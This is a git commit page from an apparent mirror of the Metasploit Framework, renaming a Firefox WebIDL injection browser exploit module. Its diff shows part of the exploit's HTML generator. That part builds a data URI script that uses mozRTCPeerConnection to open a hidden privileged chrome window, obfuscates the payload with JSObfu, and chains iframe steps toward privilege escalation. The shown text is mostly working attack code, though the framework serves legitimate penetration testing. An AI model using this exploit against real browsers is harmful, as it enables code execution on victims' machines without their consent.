infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Rename exploit module.

bug/bundler_fix sprint-F00
Joe Vennix 2014-08-26 23:05:41 -05:00
parent 96276aa6fa
commit 26cfed6c6a
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
1 changed files with 6 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/multi/browser/firefox_webidl_javascript_injection.rb → modules/exploits/multi/browser/firefox_webidl_injection.rb
View File

@ -73,8 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
frame = Rex::Text.rand_text_alpha(5 + rand(12))
r = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function(){},function(){top.vvv=window.open('chrome://browser/content/browser.xul', 'sd32elf', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
@ -109,7 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
// (this is important later)
function step2() {
var clear = setInterval(function(){
top.vvv.location ='data:text/html,<html><body><iframe mozBrowser src="about:blank"></iframe></body></html>';
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
'src="about:blank"></iframe></body></html>';
clearInterval(clear);
setTimeout(step3, 100);
}, 10);